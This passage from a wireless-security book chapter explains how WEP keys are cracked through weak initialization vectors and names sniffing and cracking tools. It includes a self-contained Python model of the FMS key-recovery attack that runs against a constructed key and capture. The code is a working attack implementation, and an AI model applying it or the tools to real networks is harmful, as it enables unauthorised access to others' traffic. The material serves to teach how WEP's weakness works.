Wired Equivalent Privacy (WEP), as discussed in Chapter 4, "WEP Security," and Chapter 5, "Cracking WEP," is fundamentally flawed: an attacker who captures enough traffic can recover the key. Even so, we still strongly recommend enabling it on all your wireless networks. It will thwart the casual drive-by hacker, and it adds another layer of legal protection, because laws that prohibit cracking transmitted, encrypted signals apply only if the signal is actually encrypted. With that in mind, let's look at the practical process of cracking WEP.
The most important tool you will need to crack a WEP-encrypted signal is time. WEP encrypts every frame with the same secret key prefixed by a 24-bit initialization vector (IV), and a small fraction of those IVs are weak: a frame encrypted under a weak IV leaks information about one byte of the key. Even then, the leaked value is the correct key byte only about 5% of the time (about 13% in some cases), so the cracking tools collect a vote from every weak-IV frame they see and take the most frequent value for each byte. The longer you capture data, the more weak IVs you receive; on average you will need about 5,000,000 frames to crack a WEP-encrypted signal. To capture the encrypted data, you need a wireless sniffer such as AirSnort (available at http://airsnort.shmoo.com/). In addition to the sniffer, you need WEPCrack, a series of Perl scripts written by one of the technical reviewers for this book and named, appropriately, for what they do. These scripts are available online at http://sourceforge.net/projects/wepcrack/.
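To make the statistics above concrete, here is a small Python model of the weak-IV attack that AirSnort and WEPCrack implement (the attack published by Fluhrer, Mantin and Shamir). This is an example added for this chapter, not code from AirSnort, WEPCrack or the book; the 40-bit key, the frame payload and the "capture" are all constructed inside the script, so it runs offline. Two facts make the attack work: the per-frame RC4 key is IV || secret key, with the IV sent in the clear, and every 802.11 data frame starts with the LLC/SNAP header (AA AA 03 ...), so the first keystream byte of every frame is simply the first ciphertext byte XOR 0xAA. For key byte A, the IVs of the form (A + 3, 255, X) are the classic weak IVs; each leaks the correct byte only about 5% of the time, so the script votes across all of them and then checks the top candidates against the frame's CRC-32 integrity check value (ICV), which is how the real tools confirm a guess.

```python
"""Model of the FMS weak-IV attack on WEP. Added example: the key, payload and
capture below are constructed for illustration, not taken from a real network."""
import random
import zlib
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # every 802.11 data frame body starts with LLC/SNAP: AA AA 03 ...


def rc4_ksa(key):
    """RC4 key scheduling; WEP feeds it IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key, length):
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret, iv, payload):
    """WEP frame body: IV || RC4(IV || secret)(payload || CRC-32 ICV)."""
    plain = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4_keystream(iv + secret, len(plain))
    return iv + bytes(p ^ k for p, k in zip(plain, ks))


def wep_icv_ok(secret, frame):
    """Decrypt one frame with a candidate key; the ICV matches only for the right key."""
    iv, body = frame[:3], frame[3:]
    plain = bytes(c ^ k for c, k in zip(body, rc4_keystream(iv + secret, len(body))))
    return zlib.crc32(plain[:-4]).to_bytes(4, "little") == plain[-4:]


def fms_candidate(iv, known, z):
    """Run the KSA over the 3 IV bytes plus the key bytes recovered so far. If the
    IV is 'resolved' (S[1] + S[S[1]] lands on the next key position), the first
    keystream byte z gives a guess for that key byte. The guess is right only
    about 5% of the time; wrong guesses are spread roughly uniformly."""
    a = len(known)
    k = iv + known
    s = list(range(256))
    j = 0
    for i in range(a + 3):
        j = (j + s[i] + k[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
    if s[1] >= a + 3 or (s[1] + s[s[1]]) & 0xFF != a + 3:
        return None
    return (s.index(z) - j - s[a + 3]) & 0xFF


def weak_ivs(key_byte_index):
    """Classic weak IVs for key byte A: (A + 3, 255, X) for every X."""
    return [bytes([key_byte_index + 3, 255, x]) for x in range(256)]


def leak_count(secret, key_byte_index):
    """How many of the 256 weak IVs for one key byte actually leak it (expect roughly 5%)."""
    hits = 0
    for iv in weak_ivs(key_byte_index):
        z = rc4_keystream(iv + secret, 1)[0]
        if fms_candidate(iv, secret[:key_byte_index], z) == secret[key_byte_index]:
            hits += 1
    return hits


def fms_crack(frames, key_len=5, breadth=4):
    """Vote on each key byte over all captured frames, try the `breadth` best
    candidates depth-first, and accept the first full key whose ICV checks out."""
    samples = [(f[:3], f[3] ^ SNAP_FIRST_BYTE) for f in frames]  # (IV, first keystream byte)

    def search(known):
        if len(known) == key_len:
            return known if wep_icv_ok(known, frames[0]) else None
        votes = Counter()
        for iv, z in samples:
            guess = fms_candidate(iv, known, z)
            if guess is not None:
                votes[guess] += 1
        for guess, _ in votes.most_common(breadth):
            found = search(known + bytes([guess]))
            if found is not None:
                return found
        return None

    return search(b"")


def build_capture(secret, random_frames=300, seed=1):
    """Constructed capture: one frame per weak IV plus some ordinary IVs, shuffled."""
    rng = random.Random(seed)
    payload = bytes.fromhex("aaaa030000000800") + b"constructed payload for the example"
    frames = [wep_encrypt(secret, iv, payload) for a in range(len(secret)) for iv in weak_ivs(a)]
    frames += [wep_encrypt(secret, bytes(rng.randrange(256) for _ in range(3)), payload)
               for _ in range(random_frames)]
    rng.shuffle(frames)
    return frames


if __name__ == "__main__":
    secret = bytes.fromhex("0a1b2c3d4e")  # constructed 40-bit key
    capture = build_capture(secret)
    print("weak IVs that leak key byte 0:", leak_count(secret, 0), "of 256")
    print("recovered key:", fms_crack(capture).hex(), "from", len(capture), "frames")
```

The constructed capture is tiny because it contains every weak IV exactly once; on a real network the weak IVs are scattered through the 2^24 IV space, which is why you have to sit and sniff millions of frames before the vote for each key byte becomes decisive. Note also that repeats of the same IV add nothing, since the same IV and key always give the same keystream byte.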
After you have acquired the necessary tools, please refer to the following list for a step-by-step guide to cracking a WEP-encrypted signal.
For additional information about WEP theory, please refer to Chapters 4 and 5.